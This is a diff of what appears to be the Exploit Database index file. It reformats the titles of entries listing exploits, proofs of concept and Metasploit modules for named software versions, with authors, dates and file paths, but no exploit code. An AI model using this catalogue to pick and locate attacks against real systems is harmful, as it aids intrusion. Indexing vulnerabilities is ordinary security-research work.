Upload",2013-02-20,Metasploit,php,remote,0 24530,platforms/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,php,webapps,0 24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009)",2013-02-23,Metasploit,windows,remote,0 -24533,platforms/php/webapps/24533.txt,"RTTucson Quotations Database Script (Auth Bypass) SQL Injection",2013-02-21,"cr4wl3r ",php,webapps,0 +24533,platforms/php/webapps/24533.txt,"RTTucson Quotations Database Script - (Auth Bypass) SQL Injection",2013-02-21,"cr4wl3r ",php,webapps,0 24534,platforms/windows/webapps/24534.txt,"Alt-N MDaemon 13.0.3 / 12.5.6 - Email Body HTML/JS Injection",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24535,platforms/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24536,platforms/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple XSS Vulnerabilities",2013-02-21,"High-Tech Bridge SA",php,webapps,0 @@ -21710,7 +21710,7 @@ id,file,description,date,author,platform,type,port 24546,platforms/php/webapps/24546.txt,"MTP Poll 1.0 - Multiple XSS Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24547,platforms/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Unauthenticated Arbitrary File Upload",2013-02-26,Metasploit,php,remote,0 24548,platforms/php/remote/24548.rb,"Glossword 1.8.8 & 1.8.12 - Arbitrary File Upload",2013-02-26,Metasploit,php,remote,0 -24549,platforms/php/remote/24549.rb,"PolarPearCMS PHP File Upload",2013-02-26,Metasploit,php,remote,0 +24549,platforms/php/remote/24549.rb,"PolarPearCMS - PHP File Upload",2013-02-26,Metasploit,php,remote,0 24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0 24551,platforms/php/webapps/24551.txt,"Joomla! 3.0.2 - (highlight.php) PHP Object Injection",2013-02-27,EgiX,php,webapps,0 24552,platforms/php/webapps/24552.txt,"WordPress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0 @@ -21739,8 +21739,8 @@ id,file,description,date,author,platform,type,port 24632,platforms/asp/webapps/24632.txt,"PD9 Software MegaBBS 2.0/2.1 ladder-log.asp Multiple Parameter SQL Injection",2004-09-27,pigrelax,asp,webapps,0 24633,platforms/asp/webapps/24633.txt,"PD9 Software MegaBBS 2.0/2.1 view-profile.asp Multiple Parameter SQL Injection",2004-09-27,pigrelax,asp,webapps,0 24634,platforms/windows/dos/24634.c,"Microsoft Windows XP - TCP Packet Fragmentation Handling Denial of Service (1)",2004-09-27,Coolio,windows,dos,0 -24578,platforms/osx/local/24578.rb,"Setuid Tunnelblick Privilege Escalation",2013-03-05,Metasploit,osx,local,0 -24579,platforms/osx/local/24579.rb,"Viscosity setuid-set ViscosityHelper Privilege Escalation",2013-03-05,Metasploit,osx,local,0 +24578,platforms/osx/local/24578.rb,"Tunnelblick - Setuid Privilege Escalation",2013-03-05,Metasploit,osx,local,0 +24579,platforms/osx/local/24579.rb,"Viscosity - setuid-set ViscosityHelper Privilege Escalation",2013-03-05,Metasploit,osx,local,0 24580,platforms/windows/dos/24580.txt,"Kaspersky Internet Security 2013 - Denial of Service",2013-03-05,"Marc Heuse",windows,dos,0 24581,platforms/multiple/remote/24581.txt,"SAFE TEAM Regulus 2.2 Staffile Information Disclosure",2004-09-07,masud_libra,multiple,remote,0 24582,platforms/php/webapps/24582.txt,"SAFE TEAM Regulus 2.2 Custchoice.php Update Your Password Action Information Disclosure",2004-09-07,masud_libra,php,webapps,0 @@ -21752,7 +21752,7 @@ id,file,description,date,author,platform,type,port 24588,platforms/asp/webapps/24588.txt,"GetSolutions GetIntranet 2.2 - Multiple Remote Input Validation Vulnerabilities",2004-09-10,Criolabs,asp,webapps,0 24589,platforms/asp/webapps/24589.txt,"GetSolutions GetInternet Multiple SQL Injection",2004-09-10,Criolabs,asp,webapps,0 24590,platforms/linux/dos/24590.txt,"Apache 2.0.x - mod_ssl Remote Denial of Service",2004-09-10,"M. ""Alex"" Hankins",linux,dos,0 -24591,platforms/cgi/webapps/24591.txt,"PerlDesk Language Variable Server-Side Script Execution",2004-09-13,"Nikyt0x Argentina",cgi,webapps,0 +24591,platforms/cgi/webapps/24591.txt,"PerlDesk Language Variable - Server-Side Script Execution",2004-09-13,"Nikyt0x Argentina",cgi,webapps,0 24592,platforms/multiple/dos/24592.txt,"Pingtel Xpressa 1.2.x/2.0/2.1 Handset Remote Denial of Service",2004-09-13,@stake,multiple,dos,0 24593,platforms/unix/dos/24593.txt,"QNX Photon phrelay-cfg - -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 24594,platforms/unix/dos/24594.txt,"QNX Photon phlocale - -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 @@ -21857,7 +21857,7 @@ id,file,description,date,author,platform,type,port 24697,platforms/php/webapps/24697.txt,"Serendipity 0.x - Exit.php HTTP Response Splitting",2004-10-21,ChaoticEvil,php,webapps,0 24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.threads 3.4/3.5 - DoSearch.php SQL Injection",2004-10-21,"Florian Rock",php,webapps,0 24699,platforms/windows/dos/24699.txt,"Microsoft Windows XP WAV File Handler Denial of Service",2004-10-22,HexView,windows,dos,0 -24700,platforms/cgi/webapps/24700.txt,"Netbilling NBMEMBER Script Information Disclosure",2004-10-22,ls,cgi,webapps,0 +24700,platforms/cgi/webapps/24700.txt,"Netbilling NBMEMBER Script - Information Disclosure",2004-10-22,ls,cgi,webapps,0 24701,platforms/multiple/remote/24701.txt,"OpenWFE 1.4.x - Cross-Site Scripting / Connection Proxy",2004-10-25,"Joxean Koret",multiple,remote,0 24702,platforms/php/webapps/24702.txt,"MoniWiki 1.0/1.1 Wiki.php Cross-Site Scripting",2004-10-25,"Jeremy Bae",php,webapps,0 24703,platforms/cgi/webapps/24703.txt,"LinuxStat 2.x - Remote Directory Traversal",2004-10-25,anonymous,cgi,webapps,0 @@ -21902,7 +21902,7 @@ id,file,description,date,author,platform,type,port 24742,platforms/php/webapps/24742.txt,"Web Cookbook - Multiple SQL Injection",2013-03-13,"Saadat Ullah",php,webapps,0 24743,platforms/windows/dos/24743.txt,"Cam2pc 4.6.2 - BMP Image Processing Integer Overflow",2013-03-13,coolkaveh,windows,dos,0 24744,platforms/multiple/webapps/24744.txt,"Apache Rave 0.11 < 0.20 - User Information Disclosure",2013-03-13,"Andreas Guth",multiple,webapps,0 -24745,platforms/windows/remote/24745.rb,"Honeywell HSC Remote Deployer ActiveX Remote Code Execution",2013-03-13,Metasploit,windows,remote,0 +24745,platforms/windows/remote/24745.rb,"Honeywell HSC Remote Deployer - ActiveX Remote Code Execution",2013-03-13,Metasploit,windows,remote,0 24746,platforms/lin_x86-64/local/24746.c,"Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Local Root Exploit (2)",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0 24747,platforms/linux/dos/24747.c,"Linux Kernel 'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos,0 24748,platforms/php/webapps/24748.txt,"event calendar - Multiple Vulnerabilities",2004-11-16,"Janek Vind",php,webapps,0 @@ -21925,7 +21925,7 @@ id,file,description,date,author,platform,type,port 24766,platforms/php/webapps/24766.txt,"NuKed-Klan 1.x - Submit Link Function HTML Injection",2004-11-23,XioNoX,php,webapps,0 24767,platforms/windows/remote/24767.txt,"Raven Software Soldier Of Fortune 2 - Buffer Overflow",2004-11-23,"Luigi Auriemma",windows,remote,0 24768,platforms/php/webapps/24768.txt,"SugarCRM 1.x/2.0 Module record Parameter SQL Injection",2004-11-23,"James Bercegay",php,webapps,0 -24769,platforms/php/webapps/24769.txt,"SugarCRM 1.x/2.0 Module Traversal Arbitrary File Access",2004-11-23,"James Bercegay",php,webapps,0 +24769,platforms/php/webapps/24769.txt,"SugarCRM 1.x/2.0 Module Traversal - Arbitrary File Access",2004-11-23,"James Bercegay",php,webapps,0 24770,platforms/windows/dos/24770.py,"Jabber Server 2.0 - Multiple Remote Buffer Overflow Vulnerabilities",2004-11-24,icbm,windows,dos,0 24771,platforms/php/webapps/24771.txt,"KorWeblog 1.6.2 - Remote Directory Listing",2004-11-24,"Jeremy Bae",php,webapps,0 24772,platforms/php/webapps/24772.txt,"Zwiki 0.10/0.36.2 - Cross-Site Scripting",2004-11-24,"Jeremy Bae",php,webapps,0 @@ -21956,18 +21956,18 @@ id,file,description,date,author,platform,type,port 24797,platforms/php/webapps/24797.txt,"Advanced Guestbook 2.2/2.3 - Cross-Site Scripting",2004-12-02,"Emile van Elen",php,webapps,0 24798,platforms/php/webapps/24798.txt,"PAFileDB 3.1 - Error Message Path Disclosure",2004-12-04,y3dips,php,webapps,0 24799,platforms/multiple/dos/24799.txt,"Mozilla0.x_Netscape 3/4_Firefox 1.0 JavaScript IFRAME Rendering Denial Of Servic",2004-12-06,"Niek van der Maas",multiple,dos,0 -24800,platforms/windows/remote/24800.txt,"Microsoft Internet Explorer 5.0.1 FTP URI Arbitrary FTP Server Command Execution",2004-12-06,"Albert Puigsech Galicia",windows,remote,0 -24801,platforms/linux/remote/24801.txt,"KDE FTP KIOSlave URI Arbitrary FTP Server Command Execution",2004-12-06,"Albert Puigsech Galicia",linux,remote,0 +24800,platforms/windows/remote/24800.txt,"Microsoft Internet Explorer 5.0.1 FTP URI - Arbitrary FTP Server Command Execution",2004-12-06,"Albert Puigsech Galicia",windows,remote,0 +24801,platforms/linux/remote/24801.txt,"KDE FTP KIOSlave URI - Arbitrary FTP Server Command Execution",2004-12-06,"Albert Puigsech Galicia",linux,remote,0 24802,platforms/windows/remote/24802.txt,"Microsoft Internet Explorer 6.0 Sysimage Protocol Handler Local File Detection",2004-12-07,"Gregory R. Panakkal",windows,remote,0 24803,platforms/php/webapps/24803.txt,"Blog Torrent 0.80 BTDownload.php Cross-Site Scripting",2004-12-07,Lostmon,php,webapps,0 24804,platforms/linux/dos/24804.c,"Linux Kernel 2.6.x - AIO_Free_Ring Local Denial of Service",2004-12-07,"Darrick J. Wong",linux,dos,0 -24805,platforms/multiple/dos/24805.txt,"MySQL MaxDB 7.5 WAHTTP Server Remote Denial of Service",2004-12-07,"Evgeny Demidov",multiple,dos,0 +24805,platforms/multiple/dos/24805.txt,"MySQL MaxDB 7.5 - WAHTTP Server Remote Denial of Service",2004-12-07,"Evgeny Demidov",multiple,dos,0 24806,platforms/php/webapps/24806.txt,"darryl burgdorf weblibs 1.0 - Directory Traversal",2004-12-07,"John Bissell",php,webapps,0 24807,platforms/multiple/dos/24807.txt,"MD5 Message Digest Algorithm Hash Collision Weakness",2004-12-07,"Dan Kaminsky",multiple,dos,0 24808,platforms/windows/remote/24808.txt,"Microsoft Internet Explorer 6.0 - Search Pane URI Obfuscation",2004-12-08,http-equiv,windows,remote,0 24809,platforms/multiple/dos/24809.txt,"Kerio Personal Firewall 2.1.x/4.x - Local Denial of Service",2004-12-08,cesaro,multiple,dos,0 24810,platforms/php/webapps/24810.txt,"PhpGedView 2.x - Descendancy.php Cross-Site Scripting",2004-01-19,JeiAr,php,webapps,0 -24811,platforms/windows/remote/24811.txt,"F-Secure Policy Manager 5.11 FSMSH.DLL CGI Application Installation Path Disclosure",2004-12-09,oliver@greyhat.de,windows,remote,0 +24811,platforms/windows/remote/24811.txt,"F-Secure Policy Manager 5.11 - FSMSH.DLL CGI Application Installation Path Disclosure",2004-12-09,oliver@greyhat.de,windows,remote,0 24814,platforms/php/webapps/24814.txt,"PhpGedView 2.5/2.6 - Index.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24815,platforms/linux/dos/24815.txt,"Gamespy Software Development Kit CD-Key Validation Buffer Overflow",2004-12-10,"Luigi Auriemma",linux,dos,0 24816,platforms/php/webapps/24816.txt,"PhpGedView 2.5/2.6 Individual.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 @@ -22039,8 +22039,8 @@ id,file,description,date,author,platform,type,port 24885,platforms/windows/local/24885.html,"LiquidXML Studio 2010 - ActiveX Remote (0Day)",2013-03-25,Dr_IDE,windows,local,0 24886,platforms/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - (ActUWzd.dll (WzTitle)) Remote Exploit",2013-03-25,Dr_IDE,windows,remote,0 24887,platforms/windows/remote/24887.rb,"KingView Log File Parsing Buffer Overflow",2013-03-25,Metasploit,windows,remote,0 -24888,platforms/linux/remote/24888.rb,"Mutiny Remote Command Execution",2013-03-25,Metasploit,linux,remote,0 -24891,platforms/windows/remote/24891.rb,"HP Intelligent Management Center Arbitrary File Upload",2013-03-26,Metasploit,windows,remote,0 +24888,platforms/linux/remote/24888.rb,"Mutiny - Remote Command Execution",2013-03-25,Metasploit,linux,remote,0 +24891,platforms/windows/remote/24891.rb,"HP Intelligent Management Center - Arbitrary File Upload",2013-03-26,Metasploit,windows,remote,0 24892,platforms/hardware/remote/24892.txt,"Rosewill RSVA11001 - Remote Command Injection",2013-03-26,"Eric Urban",hardware,remote,0 24893,platforms/php/webapps/24893.txt,"PsychoStats 3.2.2b - (awards.php id param) Blind SQL Injection",2013-03-27,"Mohamed from ALG",php,webapps,0 24894,platforms/php/webapps/24894.txt,"ClipShare 4.1.1 - Multiples Vulnerabilites",2013-03-27,Esac,php,webapps,0 @@ -22049,7 +22049,7 @@ id,file,description,date,author,platform,type,port 24898,platforms/php/webapps/24898.txt,"SynConnect Pms - (index.php loginid param) SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0 24899,platforms/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Privilege Escalation",2013-03-29,"Mohammad abou hayt",hardware,local,0 24943,platforms/windows/remote/24943.py,"BigAnt Server 2.97 - DDNF Username Buffer Overflow",2013-04-10,"Craig Freyman",windows,remote,0 -24955,platforms/linux/remote/24955.rb,"Nagios Remote Plugin Executor Arbitrary Command Execution",2013-04-12,Metasploit,linux,remote,5666 +24955,platforms/linux/remote/24955.rb,"Nagios Remote Plugin Executor - Arbitrary Command Execution",2013-04-12,Metasploit,linux,remote,5666 24917,platforms/windows/dos/24917.py,"Easy DVD Player 3.5.1 - (libav) libavcodec_plugin.dll DoS",2013-04-05,metacom,windows,dos,0 24901,platforms/windows/webapps/24901.txt,"MailOrderWorks 5.907 - Multiple Vulnerabilities",2013-03-29,Vulnerability-Lab,windows,webapps,0 24902,platforms/php/remote/24902.rb,"STUNSHELL Web Shell Remote PHP Code Execution",2013-03-29,Metasploit,php,remote,0 @@ -22074,15 +22074,15 @@ id,file,description,date,author,platform,type,port 24928,platforms/hardware/webapps/24928.txt,"TP-Link TD-8817 6.0.1 Build 111128 Rel.26763 - CSRF",2013-04-08,Un0wn_X,hardware,webapps,0 24929,platforms/linux/local/24929.rb,"HP System Management Homepage - Local Privilege Escalation",2013-04-08,Metasploit,linux,local,0 24930,platforms/windows/dos/24930.txt,"Groovy Media Player 3.2.0 - (.mp3) Buffer Overflow",2013-04-08,"Akshaysinh Vaghela",windows,dos,0 -24931,platforms/hardware/remote/24931.rb,"Netgear DGN1000B setup.cgi Remote Command Execution",2013-04-08,Metasploit,hardware,remote,0 +24931,platforms/hardware/remote/24931.rb,"Netgear DGN1000B - setup.cgi Remote Command Execution",2013-04-08,Metasploit,hardware,remote,0 24932,platforms/linux/webapps/24932.txt,"Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities",2013-04-08,"SEC Consult",linux,webapps,0 24933,platforms/linux/local/24933.txt,"PonyOS 0.4.99-mlp - Multiple Vulnerabilities",2013-04-08,"John Cartwright",linux,local,0 24934,platforms/php/webapps/24934.txt,"WHMCS Group Pay Plugin 1.5 - (grouppay.php hash param) SQL Injection",2013-04-08,"HJauditing Employee Tim",php,webapps,0 -24935,platforms/linux/remote/24935.rb,"MongoDB nativeHelper.apply Remote Code Execution",2013-04-08,Metasploit,linux,remote,0 -24936,platforms/hardware/remote/24936.rb,"Linksys E1500/E2500 apply.cgi Remote Command Injection",2013-04-08,Metasploit,hardware,remote,0 +24935,platforms/linux/remote/24935.rb,"MongoDB - nativeHelper.apply Remote Code Execution",2013-04-08,Metasploit,linux,remote,0 +24936,platforms/hardware/remote/24936.rb,"Linksys E1500/E2500 - apply.cgi Remote Command Injection",2013-04-08,Metasploit,hardware,remote,0 24937,platforms/linux/remote/24937.rb,"HP System Management Anonymous Access Code Execution",2013-04-08,Metasploit,linux,remote,0 24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (2)",2013-04-08,Metasploit,multiple,remote,0 -27433,platforms/windows/dos/27433.txt,"Microsoft Internet Explorer 5.0.1 Script Action Handler Buffer Overflow",2006-03-16,"Michal Zalewski",windows,dos,0 +27433,platforms/windows/dos/27433.txt,"Microsoft Internet Explorer 5.0.1 - Script Action Handler Buffer Overflow",2006-03-16,"Michal Zalewski",windows,dos,0 24957,platforms/php/webapps/24957.txt,"Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple CSRF Vulnerabilities",2013-04-15,"Henry Hoggard",php,webapps,0 24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption BoF",2013-04-12,Wireghoul,windows,remote,0 24968,platforms/windows/dos/24968.rb,"Mikrotik Syslog Server for Windows 1.15 - Denial of Service (Metasploit)",2013-04-22,xis_one,windows,dos,514 @@ -22091,7 +22091,7 @@ id,file,description,date,author,platform,type,port 643,platforms/windows/remote/643.c,"SLMail 5.5 - POP3 PASS Remote Buffer Overflow Exploit",2004-12-21,"Haroon Rashid Astwat",windows,remote,0 646,platforms/windows/remote/646.c,"SLMail 5.5 - Remote Buffer Overflow Exploit",2004-12-22,"Ivan Ivanovic",windows,remote,0 24944,platforms/windows/remote/24944.py,"FreeFloat FTP 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote,0 -24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL apply.cgi Command Execution",2013-04-10,Metasploit,hardware,remote,0 +24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL - apply.cgi Command Execution",2013-04-10,Metasploit,hardware,remote,0 24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit",2013-04-10,Metasploit,multiple,remote,0 24947,platforms/linux/remote/24947.txt,"MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution",2013-04-08,agixid,linux,remote,0 27434,platforms/php/webapps/27434.txt,"Oxynews Index.php SQL Injection",2006-03-16,R00T3RR0R,php,webapps,0 @@ -22115,11 +22115,11 @@ id,file,description,date,author,platform,type,port 25090,platforms/php/webapps/25090.txt,"XGB 2.0 - Authentication Bypass",2005-02-08,"Albania Security Clan",php,webapps,0 25091,platforms/multiple/remote/25091.txt,"realnetworks realarcade 1.2.0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",multiple,remote,0 25816,platforms/php/webapps/25816.txt,"Ovidentia FX - Remote File Inclusion",2005-06-10,Status-x,php,webapps,0 -25817,platforms/cgi/webapps/25817.txt,"JamMail 1.8 Jammail.pl Remote Arbitrary Command Execution",2005-06-12,blahplok,cgi,webapps,0 +25817,platforms/cgi/webapps/25817.txt,"JamMail 1.8 Jammail.pl Remote - Arbitrary Command Execution",2005-06-12,blahplok,cgi,webapps,0 25818,platforms/php/webapps/25818.txt,"Singapore 0.9.11 beta Image Gallery - Index.php Cross-Site Scripting",2005-06-13,TheGreatOne2176,php,webapps,0 24972,platforms/windows/dos/24972.c,"Flightgear 2.0/2.4 - Remote Format String Exploit",2013-04-22,Kurono,windows,dos,0 24973,platforms/php/webapps/24973.txt,"VoipNow 2.5 - Local File Inclusion",2013-04-22,i-Hmx,php,webapps,0 -24974,platforms/hardware/remote/24974.rb,"Netgear DGN2200B pppoe.cgi Remote Command Execution",2013-04-22,Metasploit,hardware,remote,0 +24974,platforms/hardware/remote/24974.rb,"Netgear DGN2200B - pppoe.cgi Remote Command Execution",2013-04-22,Metasploit,hardware,remote,0 24975,platforms/hardware/webapps/24975.txt,"D'Link DIR-615 Hardware rev D3 / DIR-300 Hardware rev A - Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0 24976,platforms/multiple/remote/24976.rb,"Java Applet Reflection Type Confusion Remote Code Execution",2013-04-23,Metasploit,multiple,remote,0 25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 Viewthread.php Information Disclosure",2005-02-08,TheGreatOne2176,php,webapps,0 @@ -22156,7 +22156,7 @@ id,file,description,date,author,platform,type,port 29278,platforms/php/webapps/29278.pl,"Work System ECommerce 3.0.3/3.0.4 Forum.php Remote File Inclusion",2006-12-13,the_Edit0r,php,webapps,0 24999,platforms/windows/remote/24999.py,"Windows Light HTTPD 0.1 - Buffer Overflow",2013-04-25,"Jacob Holcomb",windows,remote,0 25294,platforms/windows/remote/25294.rb,"Microsoft Internet Explorer - CGenericElement Object Use-After-Free",2013-05-07,Metasploit,windows,remote,0 -25001,platforms/linux/remote/25001.rb,"GroundWork monarch_scan.cgi OS Command Injection",2013-04-25,Metasploit,linux,remote,0 +25001,platforms/linux/remote/25001.rb,"GroundWork - monarch_scan.cgi OS Command Injection",2013-04-25,Metasploit,linux,remote,0 25002,platforms/php/webapps/25002.txt,"Hornbill Supportworks ITSM 1.0.0 - SQL Injection",2013-04-25,"Joseph Sheridan",php,webapps,0 25003,platforms/php/webapps/25003.txt,"phpMyAdmin 3.5.8 / 4.0.0-RC2 - Multiple Vulnerabilities",2013-04-25,waraxe,php,webapps,0 25004,platforms/linux/dos/25004.txt,"QwikMail 0.3 HELO Command Buffer Overflow",2004-12-15,"Jonathan Rockway",linux,dos,0 @@ -22238,7 +22238,7 @@ id,file,description,date,author,platform,type,port 25079,platforms/multiple/remote/25079.txt,"People Can Fly Painkiller Gamespy 1.3 CD-Key Hash Remote Buffer Overflow",2005-02-02,"Luigi Auriemma",multiple,remote,0 25080,platforms/linux/local/25080.txt,"Newsgrab 0.5.0pre4 - Multiple Local And Remote Vulnerabilities",2005-02-02,"Niels Heinen",linux,local,0 25081,platforms/multiple/dos/25081.txt,"LANChat Pro Revival 1.666c UDP Processing Remote Denial of Service",2005-04-29,"Donato Ferrante",multiple,dos,0 -25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer Malformed HTTP POST Request Denial of Service",2005-02-03,"laurent oudot",hardware,dos,0 +25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer - Malformed HTTP POST Request Denial of Service",2005-02-03,"laurent oudot",hardware,dos,0 25083,platforms/windows/dos/25083.txt,"RaidenHTTPD 1.1.27 - Remote File Disclosure",2005-02-05,"Donato Ferrante",windows,dos,0 25084,platforms/asp/webapps/25084.txt,"Microsoft Outlook 2003 Web Access Login Form Remote URI Redirection",2005-02-07,"Morning Wood",asp,webapps,0 25085,platforms/windows/dos/25085.txt,"Microsoft Office XP 2000/2002 - HTML Link Processing Remote Buffer Overflow",2005-02-08,"Rafel Ivgi",windows,dos,0 @@ -22252,7 +22252,7 @@ id,file,description,date,author,platform,type,port 25096,platforms/cgi/webapps/25096.txt,"AWStats 5.x/6.x - Debug Remote Information Disclosure",2005-02-14,GHC,cgi,webapps,0 25097,platforms/php/webapps/25097.txt,"Brooky CubeCart 2.0.1/2.0.4 ndex.php language Parameter XSS",2005-02-14,"John Cobb",php,webapps,0 25098,platforms/php/webapps/25098.txt,"Brooky CubeCart 2.0.1/2.0.4 - index.php language Parameter Traversal Arbitrary File Access",2005-02-14,"John Cobb",php,webapps,0 -25099,platforms/php/webapps/25099.txt,"CitrusDB 0.3.6 importcc.php Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 +25099,platforms/php/webapps/25099.txt,"CitrusDB 0.3.6 importcc.php - Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 25100,platforms/php/webapps/25100.txt,"CitrusDB 0.3.6 - uploadcc.php Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 25101,platforms/php/webapps/25101.txt,"CitrusDB 0.3.6 importcc.php CSV File SQL Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0 25102,platforms/php/webapps/25102.txt,"CitrusDB 0.3.6 - Remote Authentication Bypass",2004-02-15,"RedTeam Pentesting",php,webapps,0 @@ -22260,7 +22260,7 @@ id,file,description,date,author,platform,type,port 25104,platforms/php/webapps/25104.txt,"CitrusDB 0.3.6 - Arbitrary Local PHP File Include",2005-02-15,"RedTeam Pentesting",php,webapps,0 25105,platforms/php/webapps/25105.txt,"OSCommerce 2.2 Contact_us.php Cross-Site Scripting",2005-02-15,"John Cobb",php,webapps,0 25106,platforms/linux/local/25106.c,"Typespeed 0.4.1 - Local Format String",2005-02-16,"Ulf Harnhammar",linux,local,0 -25107,platforms/hardware/dos/25107.txt,"Check Point VPN-1 SecureClient Malformed IP Address Local Memory Access",2005-02-16,"Wang Ning",hardware,dos,0 +25107,platforms/hardware/dos/25107.txt,"Check Point VPN-1 SecureClient - Malformed IP Address Local Memory Access",2005-02-16,"Wang Ning",hardware,dos,0 25108,platforms/cgi/webapps/25108.txt,"AWStats 5.x/6.x - Logfile Parameter Remote Command Execution",2005-02-16,newbug@chroot.org,cgi,webapps,0 25109,platforms/php/webapps/25109.txt,"DCP-Portal 6.1.1 - Multiple SQL Injection",2005-02-16,Exoduks,php,webapps,0 25110,platforms/asp/webapps/25110.txt,"Microsoft ASP.NET 1.0/1.1 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-16,"Andrey Rusyaev",asp,webapps,0 @@ -22276,8 +22276,8 @@ id,file,description,date,author,platform,type,port 25120,platforms/php/webapps/25120.txt,"BibORB 1.3.2 - index.php Traversal Arbitrary File Manipulation",2005-02-17,"Patrick Hof",php,webapps,0 25121,platforms/php/webapps/25121.txt,"BibORB 1.3.2 Login Module Multiple Parameter SQL Injection",2005-02-17,"Patrick Hof",php,webapps,0 25122,platforms/linux/remote/25122.txt,"glFTPD 1.x/2.0 ZIP Plugins Multiple Directory Traversal Vulnerabilities",2005-02-18,"Paul Craig",linux,remote,0 -25123,platforms/php/webapps/25123.txt,"TrackerCam 5.12 ComGetLogFile.php3 fm Parameter Traversal Arbitrary File Access",2005-02-18,"Luigi Auriemma",php,webapps,0 -25124,platforms/hardware/dos/25124.txt,"Thomson TCW690 Cable Modem ST42.03.0a Long GET Request DoS",2005-02-19,MurDoK,hardware,dos,0 +25123,platforms/php/webapps/25123.txt,"TrackerCam 5.12 ComGetLogFile.php3 fm Parameter Traversal - Arbitrary File Access",2005-02-18,"Luigi Auriemma",php,webapps,0 +25124,platforms/hardware/dos/25124.txt,"Thomson TCW690 Cable Modem ST42.03.0a - Long GET Request DoS",2005-02-19,MurDoK,hardware,dos,0 25125,platforms/php/webapps/25125.txt,"ZeroBoard 4.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-02-19,"albanian haxorz",php,webapps,0 25126,platforms/php/webapps/25126.txt,"eggBlog 4.1.2 - Arbitrary File Upload",2013-05-01,Pokk3rs,php,webapps,0 25127,platforms/php/webapps/25127.txt,"PMachine Pro 2.4 - Remote File Inclusion",2005-02-19,kc,php,webapps,0 @@ -22296,10 +22296,10 @@ id,file,description,date,author,platform,type,port 25140,platforms/windows/dos/25140.txt,"WPS Office Wpsio.dll - Stack Buffer Overflow",2013-05-01,Zhangjiantao,windows,dos,0 25141,platforms/windows/local/25141.rb,"AudioCoder 0.8.18 - Buffer Overflow Exploit (SEH)",2013-05-02,metacom,windows,local,0 25142,platforms/hardware/webapps/25142.txt,"D-Link DNS-323 - Multiple Vulnerabilities",2013-05-02,sghctoma,hardware,webapps,0 -25143,platforms/php/webapps/25143.txt,"Invision Power Board 1.x/2.0.3 SML Code Script Injection",2005-02-21,"Daniel A.",php,webapps,0 +25143,platforms/php/webapps/25143.txt,"Invision Power Board 1.x/2.0.3 - SML Code Script Injection",2005-02-21,"Daniel A.",php,webapps,0 25144,platforms/windows/remote/25144.txt,"sd server 4.0.70 - Directory Traversal",2005-02-21,CorryL,windows,remote,0 25145,platforms/php/webapps/25145.txt,"PANews 2.0 - Remote PHP Script Code Execution",2005-02-21,tjomka,php,webapps,0 -25146,platforms/windows/remote/25146.txt,"OpenConnect WebConnect 6.4/6.5 jretest.html Traversal Arbitrary File Access",2005-02-21,"Dennis Rand",windows,remote,0 +25146,platforms/windows/remote/25146.txt,"OpenConnect WebConnect 6.4/6.5 jretest.html Traversal - Arbitrary File Access",2005-02-21,"Dennis Rand",windows,remote,0 25147,platforms/cgi/webapps/25147.txt,"Biz Mail Form 2.x - Unauthorized Mail Relay",2005-02-22,"Jason Frisvold",cgi,webapps,0 25148,platforms/asp/webapps/25148.txt,"Mono 1.0.5 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-22,"Andrey Rusyaev",asp,webapps,0 25149,platforms/php/webapps/25149.txt,"iGeneric iG Shop 1.x - Multiple SQL Injection",2005-02-22,"John Cobb",php,webapps,0 @@ -22310,7 +22310,7 @@ id,file,description,date,author,platform,type,port 25154,platforms/php/webapps/25154.txt,"phpMyAdmin 2.6 - theme_left.css.php Multiple Parameter XSS",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 25155,platforms/php/webapps/25155.txt,"phpMyAdmin 2.6 - theme_right.css.php Multiple Parameter XSS",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 